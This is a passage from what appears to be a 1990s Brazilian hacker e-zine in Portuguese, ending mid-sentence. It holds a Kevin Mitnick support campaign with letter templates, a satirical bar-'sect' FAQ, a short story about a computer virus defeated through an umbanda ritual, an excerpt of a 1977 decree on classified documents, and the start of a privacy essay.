Na defesa da lei espera-se a aplicabilidade da pena infalivel, nao a
perversa.

E acompanhando este bizarro quadro que se apresenta acompanhamos
estupefatos e indignados a "proposta indecente" de acordo feita pelo
Governo Americano no comeco do ano, onde Kevin Mitnick, entre outras
coisas, teria que abrir mao pelo resto de sua vida de usufruir qualquer
tipo de beneficios(direitos autorais entre outros) com a sua propria
historia.

Definitivamente isto nao e um julgamento. Ë uma perseguicao. E uma vergonha
para todos nos.

Kevin Mitnick esta doente. Este quadro tem se repetido ao longo do ano. A
desesperanca e o peso da injustica tem sido insuportaveis para Kevin e sua
familia. Kevin Mitnick esta sendo assassinado lentamente por este sistema
devorador que precisa de bodes expiatorios para sobreviver ä propria
iniquidade.

Nos choramos com ele e por ele. Mas nao vamos desistir..

Nos APELAMOS A TODOS OS FUCADORES E AFICCIONADOS DE MICRO para que saiam de
suas ilhas e que unam-se a nos neste momento crucial . E'  um momento para
uniao e demonstracao de forca. Refletir e agir. O computer underground tem
sua propria rede e esta na hora de faze-la funcionar em beneficio de todos.
A omissao , e a consequente condenacao de Kevin Mitnick, podera estabelecer
a INJUSTICA como prerrogativa em qualquer processo futuro .

APELAMOS A TODOS para que se manifestem e ENVIEM suas cartas durante os
meses de DEZEMBRO E JANEIRO, exigindo que Kevin Mitnick tenha um julgamento
e uma sentenca justa e que seja colocado em LIBERDADE CONDICIONAL ate o
termino deste julgamento . Importante lembrar que as cartas enviadas do
Brasil levam 15 dias para serem entregues nos EUA. Nao podemos perder
tempo. Mande quantas cartas puder ate o final de janeiro, para que haja uma
centralizacao deste envio.O apelo devera ser enviado à EXMA.JUIZA MARIANNA
PFAELZER.( voce encontra a carta pronta para impressao no topico seguinte).
Basta assinar e remeter.

MUITAS CARTAS DEVEM SER ENVIADAS para uma demonstracao publica efetiva e
macica do desejo de que a Declaracao Universal dos Direitos do Homem seja
uma realidade em movimento e que Kevin Mitnick consiga, junto de sua
familia, tratamento medico adequado e onde possa exercitar seus direitos em
plena igualdade,em conformidade com a Lei, assegurando-se desta forma as
garantias necessarias à uma defesa ampla e justa.

Nossa luta agora e contra o tempo, a favor da vida. JUSTICA JÁ!

SUPPORT KEVIN CAMPAIGN

Fernanda Serpa e colegas

Modelos de Carta para a Campanha (em portugues e em ingles):

---------------------------------------------------------------------------

JUDGE MARIANNA PFAELZER

312 North Spring Street

U.S. Courthouse

Los Angeles, CA 90012-4706

Prezada Senhora,

APELAMOS a Vossa Excelencia para que conceda LIBERDADE CONDICIONAL para o
Sr. KEVIN DAVID MITNICK, detido no Metropolitan Detention Center, em Los
Angeles,California, a fim de que o mesmo possa exercitar seus DIREITOS EM
PLENA IGUALDADE, EM CONFORMIDADE COM A LEI, assegurando-se desta forma as
garantias necessarias à uma DEFESA AMPLA E JUSTA.

Atenciosamente,

_____________________________________________

Assinatura

---------------------------------------------------------------------------

JUDGE MARIANNA PFAELZER

312 North Spring Street

U.S. Courthouse

Los Angeles, CA 90012-4706

Your Honor:

I do hereby appeal to you to grant PROBATION to Mr. KEVIN DAVID MITNICK,
detained

at the Metropolitan Detention Center, in Los Angeles, California, so that
he be

able to EXERCISE HIS RIGHTS IN FULL EQUALITY, PURSUANT TO THE LAW, thus
assuring

him the necessary safeguards to a BROAD AND FAIR DEFENSE.

Sincerely,

(signature)
A alternativa aos bate-papos evangelicos

                                  [Image]

 Nos acreditamos que o mundo so' pode ser salvo atraves de um planejamento
detalhado feito atraves de amplo debate envolvendo todas as classes sociais
   juntas, sacralizadas numa mesa de bar, numa cerimonia de alto ou baixo
                 astral, unidas atraves da sagrada bebida.

Venha discutir a salvacao do Brasil, a vitoria final e incondicional do
Ismo e suas variantes

(Anarquismo, Capitalismo, Comunismo, Gayismo, etc), a BIP (vulgo Busca
Insaciavel do Prazer) e a danacao em suas varias formas (falta de grana,
 mulher, objetivo, emprego, etc) e o nao menos importante dia do juizo
final  (aquele em que finalmente algo acontecera'para nos tirar desse
marasmo que nos assola o tempo todo), entoando todos aqueles hinos sagrados
da MPB e Bossa Nova ou qualquer outro ritmo (incluindo o nosso hino "A
volta do Boemio").

Requisitos: Essencial saber falar da boca pra fora e tambem jogar conversa
fora.

Horario: Qualquer dia, qualquer hora, a gente se encontra..

Local: Seja onde for..

PERGUNTA MAIS FREQUENTES DOS NOVOS ACÓLITOS::

Pergunta: Qual e a grande pergunta?

Resposta: A grande pergunta e aquela mesmo que todos nos sabemos qual e'. O
mais importante na grande pergunta e' a resposta, que nao convence
absolutamente ninguem ou simplesmente esta'alem da nossa capacidade de
compreensao.

Pergunta: Porque a necessidade de uma discussao tao grande para se chegar a
salvacao do mundo?

Resposta: Isso esta' claramente descrito no livro do Ignorante, no
paragrafo relativo ao discurso do Franco, ou como dizem os eruditos do
assunto, a chamada lei do chato:

"Nao basta encher o saco ate' o pescoco.

Tem que estourar a boca do balao.

So' entao havera' a luz e nos nos perguntaremos:

Porque estou perdendo meu tempo aqui?"

Pergunta: Nessas reunioes, os participantes tem que assumir suas culpas e
confessar suas faltas?

Resposta: Na OPUS-NIGHT, ninguem assume nada, no maximo confessa que faltou
com sua parte na dolorosa culpa(tambem chamada de "a dolorosa").

Todo mundo aponta porem, as culpas do proximo (tambem conhecido como "o
outro","aquele cara" ou "o fulano"), que esta' heroicamente presente em
espirito, mas nao em corpo, (na maioria dos casos) e que por isso, num
gesto nobre alivia nossa parcela de culpa. A isso se chama "expiar a
culpa".

Os estudiosos afirman que aqueles que se sentem aliviados com existencia do
"outro" estao assumindo talvez ate alguma culpa, mas como a discussao nao
foi (ainda) encerrada sobre o assunto, nada pode ser afirmado.

Pergunta: Eu sou catolico/budista/crente/etc. Posso participar das
reunioes?

Resposta: Pode. Um porem: os devotos da OPUS-NIGHT sao unanimes em afirmar
que o assunto da diferenca entre religioes nao pode em nenhuma hipotese ser
 sequer mencionado antes da comunhao sagrada em homenagem ao sangue do Deus
BACO. Os mais severos exigem que nessa comunhao todos os copos contendo a
sagrada bebida sejam esvaziados, no ato conhecido como "enxuga".

Pergunta: Qual a razao da cerimonia conhecida como "ENXUGA"?

Resposta: O ritual do enxuga e uma forma de nos nos purificarmos do mal
causado pelos problemas do dia-a-dia. Conversar sobre a salvacao exige
folego e uma mente pura em relacao ao obstaculo representado pela
realidade. Ora, como diziam os sabios escoceses, a realidade e' apenas o
resultado da ausencia cronica de alcool no sangue.

Pergunta: Mas porque a necessidade de justamente alcool na cerimonia?

Resposta: Pela mesma razao que o alcool e' usado para limpar a mesa onde
discutimos nossas ideias.

Pergunta: Os participantes da OPUS-NIGHT sao religiosos conservadores ou
liberais?

Resposta: A seita se divide entre os conservados e os conservadores,
havendo varias dissidencias, como a dos renegados.

Pergunta: Como saber a diferenca? Como saber qual e' o caminho mais
adequado?

Resposta: Os conservadores acreditam no paragrafo do ASPONE que prega:

"Preguica e' prova de sabedoria

Bebida e' uma questao de perseveranca

Dinheiro, so' se ganhar na loteria"

Os conservados se dividem entre os que se conservam em vodca, conhaque ou
pinga cinquenta e um. E' tudo uma questao de gosto.

Pergunta: Os participantes da Opus Night acreditam em Deus como nosso
senhor e que Cristo veio aqui para nos salvar?

Resposta: Uma grande parte acredita ciclicamente em Deus. Esses ciclos
costumam coincidir com o fim do mes, antes do dia do pagamento. Cenas de
desespero ocorrem e muitos rezam de forma comovente. Quanto a Jesus Cristo,
ele esta' em todos nos, quando descobrimos que nao participamos de uma
reuniao da OPUS-NIGHT. Muitos querem saber como e' o milagre da
multiplicacao de vinho. As vezes acontece.

Pergunta: Qual o caminho a OPUS-NIGHT aponta para a salvacao?

Resposta: Lendo o livro do Sabio, descobrimos que antes de se encontrar o
caminho para a salvacao, caminho para a salvacao e' necessario estar
realmente perdido. Muitos sao os caminhos para a perdicao. Andar na linha
pode ser perigosissimo, pois o trem pode matar instantaneamente. E'por isso
que, como dito acima, o caminho da salvacao envolve uma  discussao
elaborada. Os que procuram o caminho sozinho sao chamados de Renegados.

Pergunta: Qual e a visao do apocalipse para os elementos da Opus-NIGHT?

Resposta: Isso depende. Houve um racha no grupo por conta disso e ha
opiniões variadas sobre o assunto. Uma delas e que o final dos tempos deve
acontecer logo, com a vinda da "Dolorosa" e o melhor a fazer e se entupir
da "Sagrada Bebida" como forma de se prevenir contra o grande choque (isso
adiaria o fim do mundo). Ja outro grupo pensa que o Apocalipse ja ocorreu
ontem, antes de ontem ou semana passada, quando viu o resultado do:

   * jogo
   * cheque que caiu
   * aviso previo no emprego
   * etc

Dentro desse ponto de vista, o negocio e partir para a reconstrucao. Ja um
pessoal defende tambem que o mundo ja passou pela terceira guerra, o
cataclisma ja ocorreu e somos apenas larvas de moscas devorando o cadaver.
E'  bom nao puxar essa questao por nunca se saber o que vai surgir.

Com isto se encerra mais uma rodada de perguntas e respostas sobre a nossa
grande alternativa para qualquer um que tenha duvidas quanto ao que
responder para aquele que convidar para um bate-papo biblico sem fazer com
que o outro se sinta ofendido com a recusa.

Copyright:

Aqueles que se interessarem pelo texto em ingles, aguardem pela traducao
que deve estar pintando em breve. O responsavel por esse texto garante que
reza toda a noite desde que conseguiu um emprego relacionado ao uso da
INTERNET. Existe a possibilidade de que haja continuacao, se a acolhida for
positiva.
                              Exu tranca rede

PC Universe version by Knight Rider [Image]

gif da http://www3.br.freebsd.org/
tradutor: desconhecido, contribuicao da lista de piadas

 Nossa! Que e isso? Voce andou fucando aqui, Saci? Vem ca, menino!

 O boy atravessa o escritorio devagar. Tem uma perna so, sequela de sua
curta carreira como surfista de trem, e toma cuidado pra nao enroscar a
muleta nas dezenas de fios que pendem detras dos computadores instalados em
cada mesa.
 - O que foi? Exu o que? O que voce andou aprontando por aqui, Rose?
 - Eu? Nada! Achei que tivesse sido voce.
 Na tela, em vez das linhas e colunas da planilha de gastos, estranhos
sinais vermelhos sobre fundo preto. Um tridente de duas pontas, cruzes, o
escambau. Coisa de macumbeiro? Embaixo, letras tambem vermelhas
confirmando: "ETR - Exu Tranca Rede". Rosangela, secretaria bilingue, nao
fazia ideia do que era aquilo. Saci tambem nem tinha como saber, mas o
virus Exu Tranca Rede tinha, naqula tarde, paralisado quase toda a rede da
Grande Sao Paulo. Devido a regulamentacao governamental e a taxacao
excessiva, a rede paulistana era muito precaria, quase toda feita de
ligacoes clandestinas. Partindo de algum ponto da Zona Leste, provavelmente
da Mooca, o virus havia se aproveitado disto para alastrar-se, travando
sistemas e destruindo dados. A noticia so apareceria na TV de noite, ai era
tarde demais.
 - Ah, Rose, isso deve ser zoeira do pessoal da tecnica. Olha, restarta
isso dai, pressiona F8, seleciona Safe Mode e ve no que da. Eu nao posso
ficar por aqui. Ja ta na minha hora, to indo nessa.
 Saci fugiu rapidinho pro elevador, deixando Rosangela atonita, olhando
para aquilo. Era a maior roubada ficar resolvendo os pepinos da Rose, ela
parecia que nunca tava entendendo direito. Certa vez, tinha apagado um hard
disk inteiro tentando ejetar o CD interativo do Fabio Junior. Embora em
menor grau, o pessoal do escritorio era todo meio tapado nesse aspecto.
Mesmo o pessoal da tecnica sabia so comprar e instalar pacotes prontos.
Quando dava uma zica que nao tava prevista no manual, era um
deus-nos-acuda. Saci sempre conseguia dar conta do recado. A computacao
tinha virado uma coisa totalmente fechada, hermetica. Ninguem mais
programava, tava tudo pronto. So a camada mais pobre da populacao,
pilotando maquinas que eram verdadeiros Frankensteins, tinha jogo de
cintura. Saci nao era excecao. O seu velho Dual Pentium MMX 200, todo
detonado, ainda rodava uma copia do Windows 2001; ele tinha que fazer
verdadeiras magicas pra manter aquele troco no ar. O novo secretario de
seguranca ja havia comentado nas paginas amarelas da Veja: "Os ultimos
hackers sao a baianada". E era por isso que as empresas ainda contratavam
boys. Ninguem mais precisava ir ao banco, nem levar documentos de um lado
prara o outro, e claro. Mas, quando a porca torcia o rabo, so um office-boy
para resolver.
 - Ai, Saci! Ai! Corre aqui!
 - Calma, Damasio. O que aconteceu?
 - Eu tava fazendo uma fezinha aqui no TeleBicho que nem voce ensinou
quando apareceu uma coisa do demo! Cruz-credo!
 Damasio era o porteiro do edificio onde Saci trabalhava. Na sua mesinha,
no saguao, tinha um terminalzinho onde ele fazia o controle dos visitantes.
Era evangelico, mas nunca tinha se interessado em perguntar ao pastor se
Jogo do Bicho era pecado. Pelo sim, pelo nao, todo dia acessava a home page
clandestina do TeleBicho (http://www.castor.bicho.com) pra ver se dava
alguma coisa. Agora, diante daquele sinal demoniaco, suava frio. Tinha
certeza que era o capeta vindo a Terra para puni-lo. Numa mao segurava a
Biblia; na outra, o manual. Saci ficou chateado. O pessoal da tecnica
exagerou. Aquilo era sacanagem.
 - Que capeta, que nada, Damasio. Isso dai e zoeira do pessoal la de cima.
 - De cima nada, menino! E de baixo! Isso dai e sinais do inferno! Ai, meu
Deus! Eu sabia que eu tinha que gastar menos em vicios e dar o dinheiro pra
Jesus, que nem o pastou falou!
 - Nao, nao e nada disso. Pra fazer o capeta sumir faz que nem eu ensinei:
Iniciar, desligar, reiniciar o computador. Isso. Agora, da F8 rapidinho e
entra em Safe Mode. Tenho que ir, mas amanha dou uma olhada com calma pra
ver esse seu capeta.
 Antes que alguem mais aparecesse com aquela chateacao, Saci saiu pela
porta de vidro. O predio onde trabalhava ficava na Berrini. Na virada do
ano 2000, os paulistanos tinham eleito aquela avenida como o simbolo da
cidade. Cada cidade com o simbolo que merece. Imensos edificios de vidro
espelhado disputavam lugar com a favela que, ao contrario do plano original
e todas as tentativas anteriores, nunca tinha sido erradicada e agora
ocupava os espacos que podia. De um certo modo, aquele lugar era a cara de
Sao Paulo; ja fazia algumas decadas que casa terrea era curiosidade
historica. Saci esperava no ponto. Passava um pouco das seis, mas naquela
epoca a hora do rush ja nao existia mais. O transito era o mesmo das cinco
da manha ate mais ou menos as dez da noite. Entre os microcarros coreanos,
carroceiros transportando a feria de papelao do dia. Ali na frente, uma
charrete puxada por um pangare fechava uma faixa de transito inteira. O
bicho tinha empacado e estava sendo chicoteado impiedosamente, sob buzinas
e xingamentos dos motoristas. Saci conseguiu embarcar no quarto onibus
certo que passou. A galera tava pouco se lixando se ele usava muleta ou
nao. Ninguem nunca lhe cedia a vez. Ate a Vila Joaniza II, onde morava,
eram tres conducoes. Ao lado do cobrador, um cara brincava com um Game Boy
VR. Parecia um imbecil, apalpando o ar. Quase tomou um tapa quando, sem
querer, passou a mao na bunda de um negao que viajava de pe. Muitos
passageiros, de microHDTV na mao, assistiam o teipe do jogo do Corinthians
(0x0 com o Fluminense). Saci ficou assistindo por cima do ombro de um cara
e o tempo ate que passou rapido.
 - o Saci! Chega mais. Escuta aqui, cara, o que e que voce andou armando
com a sua tia? Esse negocio de exu fudeu com a minha base de dados. Isso
nao fica assim nao!
 Quando Saci chegou a Vila Joaniza II, ja estava escuro. Do lugar onde ele
descia do onibus ate a sua casa eram oito quarteiroes a pe. A rua era de
terra; nao havia calcada. As casas por ali eram uma mistura de barracos com
casinhas de alveraria. Dos postes pendia um emaranhado incrivel de fiacao;
a maioria daquilo era fibra otica. As antenas nos telhados formavam uma
verdadeira floresta. Aqui e ali, emissores de microondas. Na rua, a
molecada improvisava uma pelada com uma bola meio murcha. Quem estava
esperando por Saci no meio do caminho era Wesley, o traficante local. Por
ali todo mundo conhecia Saci e tambem a sua tia, a Mae Jurema, que tinha um
terreiro de umbanda na regiao. Quando Wesley viu o computador onde estavam
cadastrados seus clientes travar daquele jeito, sabia de quem suspeitar.
Esperava por ele encostado na porta de um bar. Ali por perto, tres de seus
"associados" nem faziam muita forca pra ocultar as Uzis por baixo de
jaquetas estampadas com logos de times da NBA. Saci explicou cuidadosamente
que nao tinha nada a ver com aquilo, e que o mesmo havia inclusive
acontecido na firma onde ele trabalhava. Wesley nao acreditou muito, mas
como era Saci quem resolvia todos os paus do seu sistema e mantinha a coisa
funcionando, nao havia muita saida. Recomendou a Saci que "ficasse ligado";
Saci prometeu dar uma geral no seu OS no dia seguinte e deu o fora. Aquela
historia estava ficando muito, muito esquisita. Definitivamente nao era uma
brincadeira do pessoal da tecnica do seu escritorio; ele precisava dar uma
olhada naquilo. E sabia quem poderia dar uma forca com essas coisas de exu.
Por sorte o terreiro da tia Jurema nao era muito fora do caminho da sua casa.
 - Menino, a gente tava te procurando! Sabe o que...
 - E, eu sei, eu sei. Foi o Exu Tranca Rede, ne?

 Keyla tinha corrido pra encontrar Saci no meio da rua. Era uma mulata
muito bonita que ajudava Mae Jurema a manter tudo em ordem e operava o
computador do terreiro. Naturalmente, estava toda de branco. Estava
preocupada com a possibilidade de ter perdido o cadastro das entidades que
baixavam no terreiro. Saci nao perdeu tempo, foi direto falar com a tia.
Jurema era cega, e o seu lugar favorito era num canto, num sofa detonado.
Ficava de olhos semicerrados e nao parava de murmurar e resmungar coisas
baixinho para si mesma. Como era velha e muito gorda, raramente levantava
dali. Keyla cuidava para que todas as suas ordens fossem executadas e lhe
trazia as refeicoes. Para muitos, Mae Jurema estava simplesmente gaga, mas
quem tivesse um pouco de paciencia geralmente se convencia do contrario.
Assim que Saci chegou, ela o chamou para perto com gesto. Nem o deixou
falar nada.
 - Meu fio, to sabendo, me contaram. E Exu que atravessou, ne? As coisa tao
parada, nao flui. Conheco bem. =CA! Voces acha que essas coisa de computador
e novidade, e nada. E tudo igual, conheco bem. As coisa de cima sao igual
as de baixo e e Exu que faz a ligacao. Ele e que abre os caminho, liga os
outros mundo com o nosso. =CA! Voces acha que essas coisa de computador nao
tem caminho, mas e tudo igual. As rua do computador, as encruzilhada, ta
tudo ai nessas rede e e Exu quem rege, ele sim. Mas as pessoa nao tem
respeito, e agora Exu ta contrariado. =CA! Conheco bem. Tem que ter respeito.
Vamo falar com ele; vamo despachar. Por oferenda, por ebo, ai ele acerta as
coisas e faz fluir o que ta bloqueado. E Exu quem tem o poder pra fazer
isso. =CA!
 Saci nao ficou muito convencido, mas de qualquer modo seria legal ver o
que dava pra fazer no sistema da tia Jurema. Era quase tao bom como o seu,
e ele nunca se separava do floptical onde guardava os seus utilitarios. A
mesa onde ficava o computador foi mudada para perto da porta do terreiro,
onde fica a Casa de Exu. Enquanto Saci restartava o sistema com um OS
alternativo, o terreiro era preparado.

 Embarabo, ago, mojuba.
 Embarabo, ago mojuba
 Omode co eko,
 Embarabo, ago mojuba.

 O quadro era, no minimo, curioso. No centro de tudo, Saci operava um
computador sem a tampa, todo remendado com silvertape. A unica luz vinha do
monitor, uma velha matriz de cristal liquido, e de dezenas de velas
brancas. Nos lados do computador e do monitor haviam sido riscados pontos
com pemba vermelha. A mesa, coberta por um pano vermelho com sinais
brancos. Em volta, as oferendas: Marafa, cidra e vinho branco em pequenas
cumbucas de barro; panelas com farinha de mandioca, mel e dende; charutos
acesos. Muitas folhas de erva espada e folhas de manga. Essencias de mirra,
rosa e sumo de arruda tornavam o ar dificil de respirar. Pessoas de branco
tocavam, em atabaques, o ponto do exu; cantavam e dancavam sincopadamente.

 Exu Ona,
 Exu Lona,
 Mo gi re lo de
 Elegbara,
 Legbara, ie ie
 Exu Ona, ke wa o!

 Saci logo percebeu que combater o virus diretamente dava pouco resultado.
A melhor estrategia seria criar um programinha que funcionasse como
"oferenda", quase uma isca. Algo que atraisse o virus, satisfazendo os seus
requerimentos, e desse modo o neutralizasse. Nao foi nada facil. O ritual
durou ate o nascer do sol; algumas pessoas entravam em transe, outras caiam
no chao, extenuadas. Saci, alheio a tudo, batia rapidamente no teclado e,
vez ou outra, dava ordens secas para o reconhecedor de voz. Tinha que
preparar o anti-virus com os seus programas dando pau e desligando-se
inesperadamente, acusando "Este programa executou uma instrucao ilegal e
sera finalizado". Passava das seis da manha, e o batuque ja havia
enfraquecido bastante, quando a oferenda subitamente foi aceita. Saci
rapidamente copiou o codigo basico do virus para um floptical e ejetou. Em
poucos segundos, o sistema foi liberado pelo Exu Tranca Rede. A conexao
estava aberta. Obedecendo as suas instrucoes, o anti-virus de Saci comecou
a replicar-se pela rede. Da Vila Joaniza II para o backbone de Diadema, e
dali pros sistemas industriais do ABC. Mas disso Saci nao podia saber, o
seu programa era impossivel de ser tracado. No dia seguinte os boletins
dariam a noticia que o virus Exu Tranca Rede havia sumido tao
misteriosamente quanto havia aparecido.
 - Eu nao te disse? Jesus e poder! Satanas nao saia daqui do meu computador
de jeito nenhum, ai eu orei, orei com fe e, de manha, quando eu cheguei, o
demo ja tinha exorcizado. O poder de Jesus conquista tudo!
 Saci estava chegando, atrasadissimo, ao trabalho. Estava com olheiras
profundas, tinha passado a noite em claro. Fez um sinal com mao para
Damasio, nao estava interessado naquele papo de crente. Nao naquela hora.
Ele teve uma noite realmente dura.
 No terreiro da Mao Jurema, escondido num canto do altar, tinha um disco
floptical dentro de um pote vazio de maionese. A tampa tinha um cruz
tracada e havia sido lacrada. Ali estava o primeiro cramulhao da era digital.
            REGULAMENTO PARA SALVAGUARDA DE ASSUNTOS SIGILOSOS

                       (decreto no 79.099 - 6/01/77)

                                Capitulo 1

                         DISPOSIÇÕES PRELIMINARES

Art. 1o  As normas estabelecidas no presente Regulamento tem por finalidade
regular o trato de assuntos sigilosos tendo em vista sua adequada
seguranca.

Art. 2o Para os fins desse regulamento serao consideradas as seguintes
conceituacões:

Acesso: possibilidade e/ou oportunidade de obter conhecimentos de assuntos
sigilosos.

Área Sigilosa: area em que se situam instalacões, edificacões ou imoveis de
qualquer tipo, ou somente parte deles, que requeira a adocao de medidas
especiais em proveito da seguranca de assuntos sigilosos que nela sejam
tratados, manuseados ou guardados.

Assunto Sigiloso: e aquele que, por sua natureza, deva ser de conhecimento
restrito e, portanto, requeira medidas especiais para a sua seguranca.

Classificar: atribuir um grau de sigilo a um material, documento ou area
que contenha ou utilize assunto sigiloso.

Credencial de seguranca: certificado, concedido por autoridade competente,
que habilita a pessoa a ter acesso a assunto sigiloso.

Custodia: responsabilidade pela seguranca de assunto sigiloso, decorrente
da posse de material ou documento sigiloso.

Documento Sigiloso: documento impresso, datilografado, gravado, desenhado,
manuscrito, fotografado ou reproduzido que contenha assunto sigiloso.

Grau de Sigilo: gradacao atribuida a um assunto sigiloso, de acordo com a
natureza de seu conteudo e tendo em vista a sua conveniencia de limitar sua
divulgacao às pessoas que tenham necessidade de conhece-lo.

Investigacao para credenciamento: investigacao feita com o proposito de
verificar se determinada pessoa possui os requisitos indispensaveis para
receber Credencial de Seguranca.

Material Sigiloso: toda materia, substancia ou artefato que, por sua
natureza, deva ser do conhecimento restrito, por conter e/ou utilizar
assunto sigiloso.

Necessidade de Conhecer: e a condicao, inerente ao efetivo exercicio de
cargo, funcao ou atividade, indispensavel para que uma pessoa, possuidora
da Credencial de Seguranca adequada, tenha acesso a assunto sigiloso.

Visita: pessoa cuja entrada foi admitida, em carater excepcional, em area
sigilosa de organizacao privada ou do Governo.

Capitulo II

CLASSIFICAÇÃO DOS ASSUNTOS SIGILOSOS

Art. 3o Os assuntos sigilosos serao classificados, de acordo com a sua
natureza ou finalidade e em funcao da sua necessidade de seguranca, em um
dos seguintes graus de sigilo:

   * Ultra-secreto
   * Secreto
   * Confidencial
   * Reservado

Paragrafo unico. A necessidade de seguranca sera avaliada mediante
estimativa dos prejuizos que a divulgacao nao autorizada do assunto
sigiloso poderia causar aos interesses nacionais, a entidades ou
individuos.

Art. 4o A cada grau de sigilo correspondem medidas especificas de
seguranca, entre as quais se incluem as limitacões para o conhecimento de
assunto sigiloso.

$1o O grau de sigilo "Ultra-secreto" sera atribuido aos assuntos que
requeiram excepcionais medidas de seguranca, cujo teor ou caracteristicas
so devam ser do conhecimento de pessoas intimamente ligadas ao seu estudo
e/ou manuseio.

$2o O grau de sigilo "Secreto" sera atribuido aos assuntos que requeiram
elevadas medidas de seguranca, cujo teor ou caracteristicas possam ser  do
conhecimento de pessoas que, sem estarem intimamente ligadas ao seu estudo
e/ou manuseio, sejam autorizadas a deles tomarem conhecimento,
funcionalmente.

$3o O grau de sigilo "Confidencial" sera atribuido aos assuntos cujo
conhecimento por pessoa nao autorizada possa ser prejudicial aos interesses
nacionais, a individuos ou entidades ou criar embaraco administrativo.

$4o O grau de sigilo "Reservado" sera atribuido aos assuntos que nao devam
ser do conhecimento do publico em geral.

Art. 5o Os assuntos sigilosos serao classificados de acordo com o seu
conteudo e nao necessariamente, em razao de suas relacões com outro
assunto.

$1o Sao assuntos normalmente classificados como "Ultra-secreto" aqueles da
politica governamental de alto nivel e segredos de Estado, tais como:

   * negociacões para aliancas politicas e militares;
   * hipoteses e planos de guerra;
   * descobertas e experiencias cientificas de valor excepcional;
   * informacões sobre politica estrangeira de alto nivel.

$2o Sao assuntos normalmente classificados como "Secreto"os referentes a
planos, programas e medidas governamentais, os extraidos de assunto
"Ultra-secreto" que, sem comprometer o excepcional grau de sigilo do
original, necessitem de maior difusao, bem como as ordens de execucao, cujo
conhecimento previo, nao autorizado, possa comprometer suas finalidades.
Poderao ser "Secretos", entre outros, os seguintes assuntos:

   * planos ou detalhes de operacões militares
   * planos ou detalhes de operacões economicas ou financeiras;
   * aperfeicoamento em tecnicas ou materiais ja existentes;
   * informes ou informacões sobre dados de elevado interesse relativo a
     aspectos fisicos, politicos, economicos, psicossociais e militares
     nacionais ou de paises estrangeiros;
   * materiais de importancia nos setores de criptografia, comunicacões e
     processamento de informacões.

$ 3o Sao assuntos normalmente classificados como "Confidencial" os
referentes a pessoal, material, financas etc.. cujo sigilo deva ser mantido
por interesse do Governo e das partes, tais como:

   * informes e informacões sobre atividades de pessoas e entidades:
   * ordens de execucao cuja difusao previa nao seja recomendada;
   * radiofrequencias de importancia especial ou aquelas que devam ser
     freqüentemente trocadas;
   * indicativos de chamadas de especial importancia que devam ser
     freqüentemente distribuidos;
   * cartas, fotografias aereas e negativos, nacionais e estrangeiros, que
     indiquem instalacões consideradas importantes para a Seguranca
     Nacional.

$ 4o - Sao assuntos normalmente classificados como "Reservado" os que nao
devam ser do conhecimento do publico em geral, tais como:

   * outros informes e informacões,
   * assuntos tecnicos;
   * partes de planos, programas e projetos e suas respectivas ordens de
     execucao;
   * cartas, fotografias aereas e negativos, nacionais e estrangeiros, que
     indiquem instalacões importantes.

Art.6o  O grau de Sigilo "Ultra-secreto" so podera ser atribuido pelas
seguintes autoridades:

   * Presidente da Republica;
   * Vice-presidente da Republica
   * Ministros de Estado;
   * Chefe do Estado-maior da Armada, do Exercito e da Aeronautica.

Art. 7o Alem das autoridades estabelecidas no art. 6o, podem atribuir grau
de sigilo:

I- "Secreto", as autoridades que exercam funcões de direcao, comando ou
chefia.

II- "Confidencial" e "Reservado", os Oficiais das Forcas Armadase
Servidores Civis, estes de acordo com regulamentacao especifica de cada
Ministerio ou orgao da Presidencia da Republica.

Art. 8o A autoridade responsavel pela classificacao de um assunto sigiloso,
ou autoridade mais elevada, podera altera-la ou cancela-la, por meio de
oficio, circular ou particular, dirigido às autoridades que tenham a
respectiva custodia.

Paragrafo unico. Na presidencia da Republica, o Ministro Chefe do Gabinete
Militar e o Ministro Chefe do Gabinete Civil poderao alterar ou cancelar a
classificacao de qualquer documento que, no interesse da administracao,
tenha que ser publicado no Diario Oficial.

Art. 9o A classificacao exagerada retarda, desnecessariamente, o trato de
assuntos e deprecia a importancia do grau de sigilo. Desse modo, o criterio
para a classificacao deve ser o menos restritivo possivel.
                     Aquele que conta seus segredos...

Derneval R.R. Cunha

Diz adeus a sua liberdade. (proverbio arabe)

No numero anterior do Barata Eletrica, havia uma serie de nocões do porque
a pessoa deve preservar algo da privacidade. Mas nao ha uma dica de como
fazer isso. Pois e algo dificil. Nao ha como fugir do fato de que
existimos. Se isso e verdade, entao temos nome, idade, data de nascimento,
local, escolaridade, profissao, hobby, condicao financeira, experiencia
anterior com varios tipos de situacões, como inveja, ciume, ganancia, ou
topicos como socialidade, religiao, etc, etc..

Isso parece uma discussao sobre Curriculo Vitae, mas o lance e que se a
pessoa vive, interage. E essa interacao fica marcada na memoria. Como todo
mundo fala "quem nao se recorda do passado esta condenado a repeti-lo", o
duro e saber o que e recordado por quem. Se eu tenho um amigo, guardo uma
visao dele. Melhor falar de amiga, assim nao fica a impressao de que estou
falando besteira. Essa amiga guarda uma visao de mim, mas provavelmente nao
vai se recordar tanto de como ela era enquanto estava comigo. E vice-versa.
Eu nao vou me recordar de como fui besta em companhia dela. A maior
tendencia e guardar e recordar aquele que que esta proximo. Recordar como
somos com alguem, isso muitos nao dao a menor importancia.

No tempo da MPB (minha infancia) dava nauseas ouvir dois ditados:
"conhece-te a ti mesmo" e "dize-me com quem andas e te direis quem es". Era
um jeito muito facil de fingir cultura e inteligencia (hoje, deve haver
outras formas de forjar a mesma coisa). Mas analisando a primeira parte, e
muito dificil a pessoa se analisar, mesmo que descubra a importancia de
fazer isso. E'  que pode custar caro, principalmente quando se utiliza
profissionais do ramo, vulgo psiquiatras ou psicologos. Com efeitos
colaterais, que e o sentimento de culpa e um medo absurdo de ficar sem
grana (conheci muitos nessa condicao) para prosseguir no caminho do
auto-conhecimento (com ajuda profissional). Isso, ate que a pessoa chega a
conclusao que a grande diferenca entre o conjunto de medicos, psicologos,
essa gente que trabalha num sanatorio e os pacientes, e que estes nao tem a
chave..

Bom, tirando a piada, e necessario outra pessoa para que possamos nos
enxergar perante a sociedade. Mesmo o espelho so pode dar uma visao
invertida da nossa imagem. E se outra pessoa te analisar ou recordar seus
atos, a memoria dela pode estar afetada por trocentas coisas. Um homem e
uma mulher. Se for uma namorada no inicio do namoro, qualquer coisa que ela
vai se lembrar do cara num determinado momento e que ele e lindo. Se for no
final do relacionamento, qualquer coisa que o cara fizer e porque ele e um
grosso, feio, mal-educado, etc.. Tem gente que nunca parou para pensar
nesses detalhes e pensa que parecer bonito ou feio tem a ver com vestir uma
roupa de domingo.

Mas considerando um intervalo de tempo menor. Uma conversa com um
desconhecido. Olha so como existem detalhes na relacao mais simples do
